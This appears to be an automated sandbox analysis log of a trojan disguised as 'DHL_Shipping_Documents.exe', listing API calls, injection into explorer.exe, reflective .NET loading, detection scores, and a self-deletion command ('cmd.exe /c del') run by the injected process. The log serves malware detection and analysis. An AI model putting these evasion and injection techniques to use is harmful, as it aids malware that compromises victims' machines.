Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_05221773	4_2_05221773
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0521D77C	4_2_0521D77C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0522D786	4_2_0522D786
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051C5610	4_2_051C5610
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0516F113	4_2_0516F113
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0518B100	4_2_0518B100
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051B514C	4_2_051B514C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051851F0	4_2_051851F0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_05187010	4_2_05187010
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0523F0FF	4_2_0523F0FF
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051C734A	4_2_051C734A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0523138C	4_2_0523138C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051713C0	4_2_051713C0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_05237231	4_2_05237231
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0519B220	4_2_0519B220
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0521D280	4_2_0521D280
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_05249283	4_2_05249283
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0516D2EC	4_2_0516D2EC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0519FD70	4_2_0519FD70
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_05219DE8	4_2_05219DE8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0523FC6E	4_2_0523FC6E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_05183C90	4_2_05183C90
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_05211CD0	4_2_05211CD0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0521FF44	4_2_0521FF44
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051FFFA0	4_2_051FFFA0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_05189E00	4_2_05189E00
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_05207E38	4_2_05207E38
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_05233E62	4_2_05233E62
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0523FE67	4_2_0523FE67
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_05237E8C	4_2_05237E8C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_05181EE2	4_2_05181EE2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0523F9B2	4_2_0523F9B2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0523F836	4_2_0523F836
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_05183830	4_2_05183830
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0519B8B0	4_2_0519B8B0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051F58B0	4_2_051F58B0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051898A0	4_2_051898A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051F98F5	4_2_051F98F5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0519FB30	4_2_0519FB30
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_05149B78	4_2_05149B78
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051BDBD9	4_2_051BDBD9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0523FBC9	4_2_0523FBC9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_05237A33	4_2_05237A33
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_05231A1A	4_2_05231A1A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051C5A80	4_2_051C5A80
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_030DE56E	4_2_030DE56E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_030C2FB0	4_2_030C2FB0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_030C2D87	4_2_030C2D87
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_030C2D90	4_2_030C2D90
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_030C9E5D	4_2_030C9E5D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_030C9E60	4_2_030C9E60

Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 0516B910 appears 280 times
Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 051C7DB4 appears 111 times
Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 051EE6D2 appears 86 times
Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 051FEF60 appears 105 times
Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 051B5110 appears 58 times
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: String function: 01515110 appears 58 times
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: String function: 014CB910 appears 280 times
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: String function: 0155EF60 appears 105 times
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: String function: 01527DB4 appears 111 times
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: String function: 0154E6D2 appears 86 times

Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0041A360 NtCreateFile,	2_2_0041A360
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0041A410 NtReadFile,	2_2_0041A410
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0041A490 NtClose,	2_2_0041A490
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0041A540 NtAllocateVirtualMemory,	2_2_0041A540
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0041A35A NtCreateFile,	2_2_0041A35A
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0041A40A NtReadFile,	2_2_0041A40A
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0041A48A NtClose,	2_2_0041A48A
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0041A53C NtAllocateVirtualMemory,	2_2_0041A53C
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01512B20 NtClose,LdrInitializeThunk,	2_2_01512B20
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01512BB0 NtAllocateVirtualMemory,LdrInitializeThunk,	2_2_01512BB0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01512A90 NtReadFile,LdrInitializeThunk,	2_2_01512A90
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01512D90 NtDelayExecution,LdrInitializeThunk,	2_2_01512D90
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01512DB0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_01512DB0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01512C60 NtQueryInformationToken,LdrInitializeThunk,	2_2_01512C60
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01512C30 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_01512C30
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01512CD0 NtMapViewOfSection,LdrInitializeThunk,	2_2_01512CD0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01512CF0 NtUnmapViewOfSection,LdrInitializeThunk,	2_2_01512CF0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01512F50 NtProtectVirtualMemory,LdrInitializeThunk,	2_2_01512F50
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01512F70 NtResumeThread,LdrInitializeThunk,	2_2_01512F70
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01512FA0 NtCreateFile,LdrInitializeThunk,	2_2_01512FA0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01512E40 NtReadVirtualMemory,LdrInitializeThunk,	2_2_01512E40
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01512E60 NtAdjustPrivilegesToken,LdrInitializeThunk,	2_2_01512E60
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01512EF0 NtCreateSection,LdrInitializeThunk,	2_2_01512EF0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01514320 NtSetContextThread,	2_2_01514320
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01514630 NtSuspendThread,	2_2_01514630
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01512B40 NtQueryInformationFile,	2_2_01512B40
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01512B60 NtEnumerateValueKey,	2_2_01512B60
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01512BC0 NtQueryInformationProcess,	2_2_01512BC0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01512BA0 NtQueryValueKey,	2_2_01512BA0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01512A70 NtWaitForSingleObject,	2_2_01512A70
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01512AB0 NtWriteFile,	2_2_01512AB0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01512D70 NtEnumerateKey,	2_2_01512D70
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01512DF0 NtWriteVirtualMemory,	2_2_01512DF0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01512C20 NtCreateKey,	2_2_01512C20
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01512CC0 NtSetInformationFile,	2_2_01512CC0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01512C80 NtQueryVirtualMemory,	2_2_01512C80
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01512CB0 NtOpenProcess,	2_2_01512CB0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01512F60 NtQuerySection,	2_2_01512F60
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01512F20 NtCreateProcessEx,	2_2_01512F20
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01512FD0 NtOpenDirectoryObject,	2_2_01512FD0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01512EA0 NtQueueApcThread,	2_2_01512EA0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01513050 NtSetValueKey,	2_2_01513050
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01513590 NtCreateMutant,	2_2_01513590
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01513980 NtGetContextThread,	2_2_01513980
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01513D40 NtOpenThread,	2_2_01513D40
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01513CE0 NtOpenProcessToken,	2_2_01513CE0
Source: C:\Windows\explorer.exe	Code function: 3_2_0E8FFE12 NtProtectVirtualMemory,	3_2_0E8FFE12
Source: C:\Windows\explorer.exe	Code function: 3_2_0E8FE232 NtCreateFile,	3_2_0E8FE232
Source: C:\Windows\explorer.exe	Code function: 3_2_0E8FFE0A NtProtectVirtualMemory,	3_2_0E8FFE0A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051B2D90 NtDelayExecution,LdrInitializeThunk,	4_2_051B2D90
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051B2DB0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_051B2DB0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051B2C30 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_051B2C30
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051B2C20 NtCreateKey,LdrInitializeThunk,	4_2_051B2C20
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051B2C60 NtQueryInformationToken,LdrInitializeThunk,	4_2_051B2C60
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051B2CD0 NtMapViewOfSection,LdrInitializeThunk,	4_2_051B2CD0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051B2FA0 NtCreateFile,LdrInitializeThunk,	4_2_051B2FA0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051B2E60 NtAdjustPrivilegesToken,LdrInitializeThunk,	4_2_051B2E60
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051B2EF0 NtCreateSection,LdrInitializeThunk,	4_2_051B2EF0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051B2B20 NtClose,LdrInitializeThunk,	4_2_051B2B20
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051B2BB0 NtAllocateVirtualMemory,LdrInitializeThunk,	4_2_051B2BB0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051B2BA0 NtQueryValueKey,LdrInitializeThunk,	4_2_051B2BA0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051B2A90 NtReadFile,LdrInitializeThunk,	4_2_051B2A90
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051B3590 NtCreateMutant,LdrInitializeThunk,	4_2_051B3590
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051B4630 NtSuspendThread,	4_2_051B4630
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051B4320 NtSetContextThread,	4_2_051B4320
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051B2D70 NtEnumerateKey,	4_2_051B2D70
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051B2DF0 NtWriteVirtualMemory,	4_2_051B2DF0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051B2C80 NtQueryVirtualMemory,	4_2_051B2C80
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051B2CB0 NtOpenProcess,	4_2_051B2CB0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051B2CC0 NtSetInformationFile,	4_2_051B2CC0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051B2CF0 NtUnmapViewOfSection,	4_2_051B2CF0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051B2F20 NtCreateProcessEx,	4_2_051B2F20
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051B2F50 NtProtectVirtualMemory,	4_2_051B2F50
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051B2F70 NtResumeThread,	4_2_051B2F70
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051B2F60 NtQuerySection,	4_2_051B2F60
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051B2FD0 NtOpenDirectoryObject,	4_2_051B2FD0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051B2E40 NtReadVirtualMemory,	4_2_051B2E40
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051B2EA0 NtQueueApcThread,	4_2_051B2EA0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051B2B40 NtQueryInformationFile,	4_2_051B2B40
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051B2B60 NtEnumerateValueKey,	4_2_051B2B60
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051B2BC0 NtQueryInformationProcess,	4_2_051B2BC0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051B2A70 NtWaitForSingleObject,	4_2_051B2A70
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051B2AB0 NtWriteFile,	4_2_051B2AB0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051B3050 NtSetValueKey,	4_2_051B3050
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051B3D40 NtOpenThread,	4_2_051B3D40
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051B3CE0 NtOpenProcessToken,	4_2_051B3CE0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051B3980 NtGetContextThread,	4_2_051B3980
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_030DA360 NtCreateFile,	4_2_030DA360
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_030DA540 NtAllocateVirtualMemory,	4_2_030DA540
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_030DA410 NtReadFile,	4_2_030DA410
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_030DA490 NtClose,	4_2_030DA490
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_030DA35A NtCreateFile,	4_2_030DA35A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_030DA53C NtAllocateVirtualMemory,	4_2_030DA53C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_030DA40A NtReadFile,	4_2_030DA40A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_030DA48A NtClose,	4_2_030DA48A

Source: DHL_Shipping_Documents.exe, 00000000.00000002.994667205.0000000005700000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameEvor.dll0 vs DHL_Shipping_Documents.exe
Source: DHL_Shipping_Documents.exe, 00000000.00000000.982450122.0000000000C62000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamerrFf.exe4 vs DHL_Shipping_Documents.exe
Source: DHL_Shipping_Documents.exe, 00000000.00000002.992103140.000000000112E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs DHL_Shipping_Documents.exe
Source: DHL_Shipping_Documents.exe, 00000000.00000002.993259257.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameEvor.dll0 vs DHL_Shipping_Documents.exe
Source: DHL_Shipping_Documents.exe, 00000000.00000002.995034076.0000000008840000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs DHL_Shipping_Documents.exe
Source: DHL_Shipping_Documents.exe, 00000000.00000002.993591273.000000000419E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs DHL_Shipping_Documents.exe
Source: DHL_Shipping_Documents.exe, 00000000.00000002.993259257.000000000301E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameEvor.dll0 vs DHL_Shipping_Documents.exe
Source: DHL_Shipping_Documents.exe, 00000002.00000002.1038376649.00000000015CD000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs DHL_Shipping_Documents.exe
Source: DHL_Shipping_Documents.exe, 00000002.00000002.1039297463.0000000003170000.00000040.10000000.00040000.00000000.sdmp	Binary or memory string: \[FileVersionCompanyNameProductNameProductVersionFileDescriptionLegalCopyrightOriginalFilenameInternalName vs DHL_Shipping_Documents.exe
Source: DHL_Shipping_Documents.exe, 00000002.00000002.1039297463.00000000035B6000.00000040.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameEXPLORER.EXEj% vs DHL_Shipping_Documents.exe
Source: DHL_Shipping_Documents.exe	Binary or memory string: OriginalFilenamerrFf.exe4 vs DHL_Shipping_Documents.exe

Source: DHL_Shipping_Documents.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: DHL_Shipping_Documents.exe	ReversingLabs: Detection: 36%
Source: DHL_Shipping_Documents.exe	Virustotal: Detection: 50%

Source: DHL_Shipping_Documents.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\DHL_Shipping_Documents.exe C:\Users\user\Desktop\DHL_Shipping_Documents.exe
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Process created: C:\Users\user\Desktop\DHL_Shipping_Documents.exe C:\Users\user\Desktop\DHL_Shipping_Documents.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\DHL_Shipping_Documents.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Process created: C:\Users\user\Desktop\DHL_Shipping_Documents.exe C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\DHL_Shipping_Documents.exe"	Jump to behavior

Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DHL_Shipping_Documents.exe.log

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@8/1@12/9

Source: C:\Windows\explorer.exe

File read: C:\Program Files (x86)\desktop.ini

Jump to behavior

Source: 0.2.DHL_Shipping_Documents.exe.2ffdfc8.4.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.DHL_Shipping_Documents.exe.3001fe0.3.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.DHL_Shipping_Documents.exe.5a80000.10.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.DHL_Shipping_Documents.exe.3036e38.5.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.DHL_Shipping_Documents.exe.3049fd4.1.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject

Source: 0.2.DHL_Shipping_Documents.exe.8840000.11.raw.unpack, Es8cNYFEtWAbd7GldL.cs	Security API names: _0020.SetAccessControl
Source: 0.2.DHL_Shipping_Documents.exe.8840000.11.raw.unpack, Es8cNYFEtWAbd7GldL.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.DHL_Shipping_Documents.exe.8840000.11.raw.unpack, Es8cNYFEtWAbd7GldL.cs	Security API names: _0020.AddAccessRule
Source: 0.2.DHL_Shipping_Documents.exe.8840000.11.raw.unpack, O2n8I0uT1sZG7evwiU.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.DHL_Shipping_Documents.exe.4354db0.8.raw.unpack, O2n8I0uT1sZG7evwiU.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.DHL_Shipping_Documents.exe.4354db0.8.raw.unpack, Es8cNYFEtWAbd7GldL.cs	Security API names: _0020.SetAccessControl
Source: 0.2.DHL_Shipping_Documents.exe.4354db0.8.raw.unpack, Es8cNYFEtWAbd7GldL.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.DHL_Shipping_Documents.exe.4354db0.8.raw.unpack, Es8cNYFEtWAbd7GldL.cs	Security API names: _0020.AddAccessRule

Source: DHL_Shipping_Documents.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll			Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2596:120:WilError_03

Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe			Jump to behavior

Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: DHL_Shipping_Documents.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: DHL_Shipping_Documents.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: DHL_Shipping_Documents.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: explorer.pdbUGP source: DHL_Shipping_Documents.exe, 00000002.00000002.1039297463.0000000003170000.00000040.10000000.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.3437321702.0000000000560000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: DHL_Shipping_Documents.exe, 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3441817605.000000000526D000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1038676921.0000000004DE4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1040268169.0000000004F97000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3441817605.0000000005140000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: DHL_Shipping_Documents.exe, DHL_Shipping_Documents.exe, 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, explorer.exe, 00000004.00000002.3441817605.000000000526D000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1038676921.0000000004DE4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1040268169.0000000004F97000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3441817605.0000000005140000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: rrFf.pdb source: DHL_Shipping_Documents.exe
Source:	Binary string: explorer.pdb source: DHL_Shipping_Documents.exe, 00000002.00000002.1039297463.0000000003170000.00000040.10000000.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.3437321702.0000000000560000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: rrFf.pdbSHA256Z source: DHL_Shipping_Documents.exe

Data Obfuscation

.NET source code contains potential unpacker

Source: DHL_Shipping_Documents.exe, Form1.cs	.Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: 0.2.DHL_Shipping_Documents.exe.8840000.11.raw.unpack, Es8cNYFEtWAbd7GldL.cs	.Net Code: Uo8BADAaF3 System.Reflection.Assembly.Load(byte[])
Source: 0.2.DHL_Shipping_Documents.exe.302836c.7.raw.unpack, WfMWUERY39pMH0yd70.cs	.Net Code: P5Ov9AJLy
Source: 0.2.DHL_Shipping_Documents.exe.302836c.7.raw.unpack, WfMWUERY39pMH0yd70.cs	.Net Code: gvKVOkpnF System.AppDomain.Load(byte[])
Source: 0.2.DHL_Shipping_Documents.exe.2feeb40.0.raw.unpack, WfMWUERY39pMH0yd70.cs	.Net Code: P5Ov9AJLy
Source: 0.2.DHL_Shipping_Documents.exe.2feeb40.0.raw.unpack, WfMWUERY39pMH0yd70.cs	.Net Code: gvKVOkpnF System.AppDomain.Load(byte[])
Source: 0.2.DHL_Shipping_Documents.exe.5700000.9.raw.unpack, WfMWUERY39pMH0yd70.cs	.Net Code: P5Ov9AJLy
Source: 0.2.DHL_Shipping_Documents.exe.5700000.9.raw.unpack, WfMWUERY39pMH0yd70.cs	.Net Code: gvKVOkpnF System.AppDomain.Load(byte[])
Source: 0.2.DHL_Shipping_Documents.exe.4354db0.8.raw.unpack, Es8cNYFEtWAbd7GldL.cs	.Net Code: Uo8BADAaF3 System.Reflection.Assembly.Load(byte[])
